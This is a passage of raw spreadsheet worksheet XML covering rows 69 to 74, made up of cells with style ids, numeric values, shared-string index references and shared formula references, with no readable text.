        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU69" s="88" t="s">
        <v>774</v>
      </c>
      <c r="CV69" s="88">
        <v>4.0</v>
      </c>
      <c r="CW69" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CX69" s="79" t="s">
        <v>775</v>
      </c>
      <c r="CY69" s="88">
        <v>402.0</v>
      </c>
      <c r="CZ69" s="88"/>
      <c r="DA69" s="88"/>
      <c r="DB69" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC69" s="88"/>
      <c r="DD69" s="88"/>
      <c r="DE69" s="88"/>
      <c r="DF69" s="88"/>
      <c r="DG69" s="89"/>
      <c r="DH69" s="89"/>
      <c r="DI69" s="89"/>
      <c r="DJ69" s="89">
        <v>0.0</v>
      </c>
      <c r="DK69" s="89"/>
      <c r="DL69" s="89"/>
      <c r="DM69" s="89"/>
      <c r="DN69" s="89"/>
      <c r="DO69" s="89"/>
      <c r="DP69" s="89"/>
      <c r="DQ69" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR69" s="91"/>
      <c r="DS69" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT69" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU69" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV69" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW69" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX69" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY69" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ69" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA69" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB69" s="74">
        <v>521157.0</v>
      </c>
      <c r="EC69" s="74">
        <v>0.0</v>
      </c>
      <c r="ED69" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE69" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="70" ht="153.75" customHeight="1">
      <c r="B70" s="71" t="s">
        <v>658</v>
      </c>
      <c r="C70" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D70" s="72" t="s">
        <v>659</v>
      </c>
      <c r="E70" s="72" t="s">
        <v>756</v>
      </c>
      <c r="F70" s="72" t="s">
        <v>757</v>
      </c>
      <c r="G70" s="97" t="s">
        <v>758</v>
      </c>
      <c r="H70" s="72" t="s">
        <v>759</v>
      </c>
      <c r="I70" s="73" t="s">
        <v>770</v>
      </c>
      <c r="J70" s="73" t="s">
        <v>771</v>
      </c>
      <c r="K70" s="73" t="s">
        <v>776</v>
      </c>
      <c r="L70" s="74">
        <v>10.0</v>
      </c>
      <c r="M70" s="74">
        <v>1.0</v>
      </c>
      <c r="N70" s="74">
        <v>1.0</v>
      </c>
      <c r="O70" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P70" s="74">
        <v>1.0</v>
      </c>
      <c r="Q70" s="74">
        <v>0.0</v>
      </c>
      <c r="R70" s="75" t="s">
        <v>106</v>
      </c>
      <c r="S70" s="76" t="s">
        <v>773</v>
      </c>
      <c r="T70" s="76" t="s">
        <v>12</v>
      </c>
      <c r="U70" s="77" t="s">
        <v>256</v>
      </c>
      <c r="V70" s="76" t="s">
        <v>256</v>
      </c>
      <c r="W70" s="76" t="s">
        <v>256</v>
      </c>
      <c r="X70" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y70" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z70" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA70" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB70" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC70" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD70" s="78">
        <v>402.0</v>
      </c>
      <c r="AE70" s="78">
        <v>1.0</v>
      </c>
      <c r="AF70" s="78">
        <v>15.0</v>
      </c>
      <c r="AG70" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH70" s="78">
        <v>402.0</v>
      </c>
      <c r="AI70" s="78"/>
      <c r="AJ70" s="78"/>
      <c r="AK70" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL70" s="78"/>
      <c r="AM70" s="78"/>
      <c r="AN70" s="78"/>
      <c r="AO70" s="78"/>
      <c r="AP70" s="80"/>
      <c r="AQ70" s="80"/>
      <c r="AR70" s="80"/>
      <c r="AS70" s="80">
        <v>0.0</v>
      </c>
      <c r="AT70" s="80"/>
      <c r="AU70" s="80"/>
      <c r="AV70" s="80"/>
      <c r="AW70" s="80"/>
      <c r="AX70" s="80"/>
      <c r="AY70" s="80"/>
      <c r="AZ70" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA70" s="82">
        <v>402.0</v>
      </c>
      <c r="BB70" s="82">
        <v>1.0</v>
      </c>
      <c r="BC70" s="82">
        <v>15.0</v>
      </c>
      <c r="BD70" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE70" s="82">
        <v>402.0</v>
      </c>
      <c r="BF70" s="82"/>
      <c r="BG70" s="82"/>
      <c r="BH70" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI70" s="82"/>
      <c r="BJ70" s="82"/>
      <c r="BK70" s="82"/>
      <c r="BL70" s="82"/>
      <c r="BM70" s="83"/>
      <c r="BN70" s="83"/>
      <c r="BO70" s="83"/>
      <c r="BP70" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ70" s="83"/>
      <c r="BR70" s="83"/>
      <c r="BS70" s="83"/>
      <c r="BT70" s="83"/>
      <c r="BU70" s="83"/>
      <c r="BV70" s="83"/>
      <c r="BW70" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX70" s="85">
        <v>402.0</v>
      </c>
      <c r="BY70" s="85">
        <v>1.0</v>
      </c>
      <c r="BZ70" s="85">
        <v>30.0</v>
      </c>
      <c r="CA70" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB70" s="85">
        <v>402.0</v>
      </c>
      <c r="CC70" s="85"/>
      <c r="CD70" s="85"/>
      <c r="CE70" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF70" s="85"/>
      <c r="CG70" s="85"/>
      <c r="CH70" s="85"/>
      <c r="CI70" s="85"/>
      <c r="CJ70" s="86"/>
      <c r="CK70" s="86"/>
      <c r="CL70" s="86"/>
      <c r="CM70" s="86">
        <v>0.0</v>
      </c>
      <c r="CN70" s="86"/>
      <c r="CO70" s="86"/>
      <c r="CP70" s="86"/>
      <c r="CQ70" s="86"/>
      <c r="CR70" s="86"/>
      <c r="CS70" s="86"/>
      <c r="CT70" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU70" s="88" t="s">
        <v>777</v>
      </c>
      <c r="CV70" s="88">
        <v>5.0</v>
      </c>
      <c r="CW70" s="88">
        <v>60221.0</v>
      </c>
      <c r="CX70" s="79" t="s">
        <v>466</v>
      </c>
      <c r="CY70" s="88" t="s">
        <v>778</v>
      </c>
      <c r="CZ70" s="88"/>
      <c r="DA70" s="88"/>
      <c r="DB70" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC70" s="88"/>
      <c r="DD70" s="88"/>
      <c r="DE70" s="88"/>
      <c r="DF70" s="88"/>
      <c r="DG70" s="89"/>
      <c r="DH70" s="89"/>
      <c r="DI70" s="89"/>
      <c r="DJ70" s="89">
        <v>0.0</v>
      </c>
      <c r="DK70" s="89"/>
      <c r="DL70" s="89"/>
      <c r="DM70" s="89"/>
      <c r="DN70" s="89"/>
      <c r="DO70" s="89"/>
      <c r="DP70" s="89"/>
      <c r="DQ70" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR70" s="91"/>
      <c r="DS70" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT70" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU70" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV70" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW70" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX70" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY70" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ70" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA70" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB70" s="74">
        <v>10.0</v>
      </c>
      <c r="EC70" s="74">
        <v>0.0</v>
      </c>
      <c r="ED70" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE70" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="71" ht="153.75" customHeight="1">
      <c r="B71" s="71" t="s">
        <v>658</v>
      </c>
      <c r="C71" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D71" s="72" t="s">
        <v>659</v>
      </c>
      <c r="E71" s="72" t="s">
        <v>756</v>
      </c>
      <c r="F71" s="72" t="s">
        <v>757</v>
      </c>
      <c r="G71" s="97" t="s">
        <v>758</v>
      </c>
      <c r="H71" s="72" t="s">
        <v>759</v>
      </c>
      <c r="I71" s="73" t="s">
        <v>779</v>
      </c>
      <c r="J71" s="73" t="s">
        <v>771</v>
      </c>
      <c r="K71" s="73" t="s">
        <v>780</v>
      </c>
      <c r="L71" s="74">
        <v>289328.0</v>
      </c>
      <c r="M71" s="74">
        <v>1.0</v>
      </c>
      <c r="N71" s="74">
        <v>1.0</v>
      </c>
      <c r="O71" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P71" s="74">
        <v>1.0</v>
      </c>
      <c r="Q71" s="74">
        <v>0.0</v>
      </c>
      <c r="R71" s="75" t="s">
        <v>106</v>
      </c>
      <c r="S71" s="76" t="s">
        <v>781</v>
      </c>
      <c r="T71" s="76" t="s">
        <v>12</v>
      </c>
      <c r="U71" s="77" t="s">
        <v>256</v>
      </c>
      <c r="V71" s="76" t="s">
        <v>782</v>
      </c>
      <c r="W71" s="76" t="s">
        <v>256</v>
      </c>
      <c r="X71" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y71" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z71" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA71" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB71" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC71" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD71" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE71" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF71" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG71" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH71" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI71" s="78"/>
      <c r="AJ71" s="78"/>
      <c r="AK71" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL71" s="78"/>
      <c r="AM71" s="78"/>
      <c r="AN71" s="78"/>
      <c r="AO71" s="78"/>
      <c r="AP71" s="80"/>
      <c r="AQ71" s="80"/>
      <c r="AR71" s="80"/>
      <c r="AS71" s="80">
        <v>0.0</v>
      </c>
      <c r="AT71" s="80"/>
      <c r="AU71" s="80"/>
      <c r="AV71" s="80"/>
      <c r="AW71" s="80"/>
      <c r="AX71" s="80"/>
      <c r="AY71" s="80"/>
      <c r="AZ71" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA71" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB71" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC71" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD71" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE71" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF71" s="82"/>
      <c r="BG71" s="82"/>
      <c r="BH71" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI71" s="82"/>
      <c r="BJ71" s="82"/>
      <c r="BK71" s="82"/>
      <c r="BL71" s="82"/>
      <c r="BM71" s="83"/>
      <c r="BN71" s="83"/>
      <c r="BO71" s="83"/>
      <c r="BP71" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ71" s="83"/>
      <c r="BR71" s="83"/>
      <c r="BS71" s="83"/>
      <c r="BT71" s="83"/>
      <c r="BU71" s="83"/>
      <c r="BV71" s="83"/>
      <c r="BW71" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX71" s="85" t="s">
        <v>481</v>
      </c>
      <c r="BY71" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BZ71" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA71" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB71" s="85" t="s">
        <v>481</v>
      </c>
      <c r="CC71" s="85"/>
      <c r="CD71" s="85"/>
      <c r="CE71" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF71" s="85"/>
      <c r="CG71" s="85"/>
      <c r="CH71" s="85"/>
      <c r="CI71" s="85"/>
      <c r="CJ71" s="86"/>
      <c r="CK71" s="86"/>
      <c r="CL71" s="86"/>
      <c r="CM71" s="86">
        <v>0.0</v>
      </c>
      <c r="CN71" s="86"/>
      <c r="CO71" s="86"/>
      <c r="CP71" s="86"/>
      <c r="CQ71" s="86"/>
      <c r="CR71" s="86"/>
      <c r="CS71" s="86"/>
      <c r="CT71" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU71" s="88" t="s">
        <v>466</v>
      </c>
      <c r="CV71" s="88">
        <v>2.0</v>
      </c>
      <c r="CW71" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CX71" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CY71" s="88" t="s">
        <v>466</v>
      </c>
      <c r="CZ71" s="88"/>
      <c r="DA71" s="88"/>
      <c r="DB71" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC71" s="88"/>
      <c r="DD71" s="88"/>
      <c r="DE71" s="88"/>
      <c r="DF71" s="88"/>
      <c r="DG71" s="89"/>
      <c r="DH71" s="89"/>
      <c r="DI71" s="89"/>
      <c r="DJ71" s="89">
        <v>0.0</v>
      </c>
      <c r="DK71" s="89"/>
      <c r="DL71" s="89"/>
      <c r="DM71" s="89"/>
      <c r="DN71" s="89"/>
      <c r="DO71" s="89"/>
      <c r="DP71" s="89"/>
      <c r="DQ71" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR71" s="91"/>
      <c r="DS71" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT71" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU71" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV71" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW71" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX71" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY71" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ71" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA71" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB71" s="74">
        <v>141737.0</v>
      </c>
      <c r="EC71" s="74">
        <v>0.0</v>
      </c>
      <c r="ED71" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE71" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="72" ht="153.75" customHeight="1">
      <c r="B72" s="71" t="s">
        <v>658</v>
      </c>
      <c r="C72" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D72" s="72" t="s">
        <v>659</v>
      </c>
      <c r="E72" s="72" t="s">
        <v>756</v>
      </c>
      <c r="F72" s="72" t="s">
        <v>757</v>
      </c>
      <c r="G72" s="97" t="s">
        <v>758</v>
      </c>
      <c r="H72" s="72" t="s">
        <v>759</v>
      </c>
      <c r="I72" s="73" t="s">
        <v>783</v>
      </c>
      <c r="J72" s="73" t="s">
        <v>771</v>
      </c>
      <c r="K72" s="73" t="s">
        <v>784</v>
      </c>
      <c r="L72" s="74">
        <v>514819.0</v>
      </c>
      <c r="M72" s="74">
        <v>1.0</v>
      </c>
      <c r="N72" s="74">
        <v>1.0</v>
      </c>
      <c r="O72" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P72" s="74">
        <v>1.0</v>
      </c>
      <c r="Q72" s="74">
        <v>0.0</v>
      </c>
      <c r="R72" s="75" t="s">
        <v>106</v>
      </c>
      <c r="S72" s="76" t="s">
        <v>785</v>
      </c>
      <c r="T72" s="76" t="s">
        <v>12</v>
      </c>
      <c r="U72" s="77" t="s">
        <v>256</v>
      </c>
      <c r="V72" s="76" t="s">
        <v>782</v>
      </c>
      <c r="W72" s="76" t="s">
        <v>256</v>
      </c>
      <c r="X72" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y72" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z72" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA72" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB72" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC72" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD72" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE72" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF72" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG72" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH72" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI72" s="78"/>
      <c r="AJ72" s="78"/>
      <c r="AK72" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL72" s="78"/>
      <c r="AM72" s="78"/>
      <c r="AN72" s="78"/>
      <c r="AO72" s="78"/>
      <c r="AP72" s="80"/>
      <c r="AQ72" s="80"/>
      <c r="AR72" s="80"/>
      <c r="AS72" s="80">
        <v>0.0</v>
      </c>
      <c r="AT72" s="80"/>
      <c r="AU72" s="80"/>
      <c r="AV72" s="80"/>
      <c r="AW72" s="80"/>
      <c r="AX72" s="80"/>
      <c r="AY72" s="80"/>
      <c r="AZ72" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA72" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB72" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC72" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD72" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE72" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF72" s="82"/>
      <c r="BG72" s="82"/>
      <c r="BH72" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI72" s="82"/>
      <c r="BJ72" s="82"/>
      <c r="BK72" s="82"/>
      <c r="BL72" s="82"/>
      <c r="BM72" s="83"/>
      <c r="BN72" s="83"/>
      <c r="BO72" s="83"/>
      <c r="BP72" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ72" s="83"/>
      <c r="BR72" s="83"/>
      <c r="BS72" s="83"/>
      <c r="BT72" s="83"/>
      <c r="BU72" s="83"/>
      <c r="BV72" s="83"/>
      <c r="BW72" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX72" s="85">
        <v>50447.0</v>
      </c>
      <c r="BY72" s="85">
        <v>1.0</v>
      </c>
      <c r="BZ72" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA72" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB72" s="85">
        <v>50447.0</v>
      </c>
      <c r="CC72" s="85"/>
      <c r="CD72" s="85"/>
      <c r="CE72" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF72" s="85"/>
      <c r="CG72" s="85"/>
      <c r="CH72" s="85"/>
      <c r="CI72" s="85"/>
      <c r="CJ72" s="86"/>
      <c r="CK72" s="86"/>
      <c r="CL72" s="86"/>
      <c r="CM72" s="86">
        <v>0.0</v>
      </c>
      <c r="CN72" s="86"/>
      <c r="CO72" s="86"/>
      <c r="CP72" s="86"/>
      <c r="CQ72" s="86"/>
      <c r="CR72" s="86"/>
      <c r="CS72" s="86"/>
      <c r="CT72" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU72" s="88" t="s">
        <v>786</v>
      </c>
      <c r="CV72" s="88">
        <v>3.0</v>
      </c>
      <c r="CW72" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CX72" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CY72" s="88" t="s">
        <v>786</v>
      </c>
      <c r="CZ72" s="88"/>
      <c r="DA72" s="88"/>
      <c r="DB72" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC72" s="88"/>
      <c r="DD72" s="88"/>
      <c r="DE72" s="88"/>
      <c r="DF72" s="88"/>
      <c r="DG72" s="89"/>
      <c r="DH72" s="89"/>
      <c r="DI72" s="89"/>
      <c r="DJ72" s="89">
        <v>0.0</v>
      </c>
      <c r="DK72" s="89"/>
      <c r="DL72" s="89"/>
      <c r="DM72" s="89"/>
      <c r="DN72" s="89"/>
      <c r="DO72" s="89"/>
      <c r="DP72" s="89"/>
      <c r="DQ72" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR72" s="91"/>
      <c r="DS72" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT72" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU72" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV72" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW72" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX72" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY72" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ72" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA72" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB72" s="74">
        <v>514819.0</v>
      </c>
      <c r="EC72" s="74">
        <v>0.0</v>
      </c>
      <c r="ED72" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE72" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="73" ht="153.75" customHeight="1">
      <c r="B73" s="71" t="s">
        <v>658</v>
      </c>
      <c r="C73" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D73" s="72" t="s">
        <v>659</v>
      </c>
      <c r="E73" s="72" t="s">
        <v>756</v>
      </c>
      <c r="F73" s="72" t="s">
        <v>757</v>
      </c>
      <c r="G73" s="97" t="s">
        <v>758</v>
      </c>
      <c r="H73" s="72" t="s">
        <v>759</v>
      </c>
      <c r="I73" s="73" t="s">
        <v>770</v>
      </c>
      <c r="J73" s="73" t="s">
        <v>787</v>
      </c>
      <c r="K73" s="73" t="s">
        <v>788</v>
      </c>
      <c r="L73" s="74">
        <v>1.0</v>
      </c>
      <c r="M73" s="74">
        <v>1.0</v>
      </c>
      <c r="N73" s="74">
        <v>1.0</v>
      </c>
      <c r="O73" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P73" s="74">
        <v>1.0</v>
      </c>
      <c r="Q73" s="74">
        <v>0.0</v>
      </c>
      <c r="R73" s="75" t="s">
        <v>187</v>
      </c>
      <c r="S73" s="76" t="s">
        <v>12</v>
      </c>
      <c r="T73" s="76" t="s">
        <v>789</v>
      </c>
      <c r="U73" s="77" t="s">
        <v>790</v>
      </c>
      <c r="V73" s="76" t="s">
        <v>144</v>
      </c>
      <c r="W73" s="76" t="s">
        <v>12</v>
      </c>
      <c r="X73" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y73" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z73" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA73" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB73" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC73" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD73" s="78">
        <v>402.0</v>
      </c>
      <c r="AE73" s="78">
        <v>1.0</v>
      </c>
      <c r="AF73" s="78">
        <v>15.0</v>
      </c>
      <c r="AG73" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH73" s="78">
        <v>402.0</v>
      </c>
      <c r="AI73" s="78"/>
      <c r="AJ73" s="78"/>
      <c r="AK73" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL73" s="78"/>
      <c r="AM73" s="78"/>
      <c r="AN73" s="78"/>
      <c r="AO73" s="78"/>
      <c r="AP73" s="80"/>
      <c r="AQ73" s="80"/>
      <c r="AR73" s="80"/>
      <c r="AS73" s="80">
        <v>0.0</v>
      </c>
      <c r="AT73" s="80"/>
      <c r="AU73" s="80"/>
      <c r="AV73" s="80"/>
      <c r="AW73" s="80"/>
      <c r="AX73" s="80"/>
      <c r="AY73" s="80"/>
      <c r="AZ73" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA73" s="82">
        <v>402.0</v>
      </c>
      <c r="BB73" s="82">
        <v>1.0</v>
      </c>
      <c r="BC73" s="82">
        <v>15.0</v>
      </c>
      <c r="BD73" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE73" s="82">
        <v>402.0</v>
      </c>
      <c r="BF73" s="82"/>
      <c r="BG73" s="82"/>
      <c r="BH73" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI73" s="82"/>
      <c r="BJ73" s="82"/>
      <c r="BK73" s="82"/>
      <c r="BL73" s="82"/>
      <c r="BM73" s="83"/>
      <c r="BN73" s="83"/>
      <c r="BO73" s="83"/>
      <c r="BP73" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ73" s="83"/>
      <c r="BR73" s="83"/>
      <c r="BS73" s="83"/>
      <c r="BT73" s="83"/>
      <c r="BU73" s="83"/>
      <c r="BV73" s="83"/>
      <c r="BW73" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX73" s="85">
        <v>402.0</v>
      </c>
      <c r="BY73" s="85">
        <v>1.0</v>
      </c>
      <c r="BZ73" s="85">
        <v>30.0</v>
      </c>
      <c r="CA73" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB73" s="85">
        <v>402.0</v>
      </c>
      <c r="CC73" s="85"/>
      <c r="CD73" s="85"/>
      <c r="CE73" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF73" s="85"/>
      <c r="CG73" s="85"/>
      <c r="CH73" s="85"/>
      <c r="CI73" s="85"/>
      <c r="CJ73" s="86"/>
      <c r="CK73" s="86"/>
      <c r="CL73" s="86"/>
      <c r="CM73" s="86">
        <v>0.0</v>
      </c>
      <c r="CN73" s="86"/>
      <c r="CO73" s="86"/>
      <c r="CP73" s="86"/>
      <c r="CQ73" s="86"/>
      <c r="CR73" s="86"/>
      <c r="CS73" s="86"/>
      <c r="CT73" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU73" s="88" t="s">
        <v>791</v>
      </c>
      <c r="CV73" s="88">
        <v>5.0</v>
      </c>
      <c r="CW73" s="88">
        <v>60221.0</v>
      </c>
      <c r="CX73" s="79" t="s">
        <v>792</v>
      </c>
      <c r="CY73" s="88" t="s">
        <v>793</v>
      </c>
      <c r="CZ73" s="88"/>
      <c r="DA73" s="88"/>
      <c r="DB73" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC73" s="88"/>
      <c r="DD73" s="88"/>
      <c r="DE73" s="88"/>
      <c r="DF73" s="88"/>
      <c r="DG73" s="89"/>
      <c r="DH73" s="89"/>
      <c r="DI73" s="89"/>
      <c r="DJ73" s="89">
        <v>0.0</v>
      </c>
      <c r="DK73" s="89"/>
      <c r="DL73" s="89"/>
      <c r="DM73" s="89"/>
      <c r="DN73" s="89"/>
      <c r="DO73" s="89"/>
      <c r="DP73" s="89"/>
      <c r="DQ73" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR73" s="91"/>
      <c r="DS73" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT73" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU73" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV73" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW73" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX73" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY73" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ73" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA73" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB73" s="74">
        <v>1.0</v>
      </c>
      <c r="EC73" s="74">
        <v>0.0</v>
      </c>
      <c r="ED73" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE73" s="96" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="74" ht="153.75" customHeight="1">
      <c r="B74" s="71" t="s">
        <v>658</v>
      </c>
      <c r="C74" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D74" s="72" t="s">
        <v>659</v>
      </c>
      <c r="E74" s="72" t="s">
        <v>756</v>
      </c>
      <c r="F74" s="72" t="s">
        <v>757</v>
      </c>
      <c r="G74" s="97" t="s">
        <v>794</v>
      </c>
      <c r="H74" s="72" t="s">
        <v>795</v>
      </c>
      <c r="I74" s="73" t="s">
        <v>796</v>
      </c>
      <c r="J74" s="73" t="s">
        <v>797</v>
      </c>
      <c r="K74" s="73" t="s">
        <v>798</v>
      </c>
      <c r="L74" s="74">
        <v>5161.0</v>
      </c>
      <c r="M74" s="74">
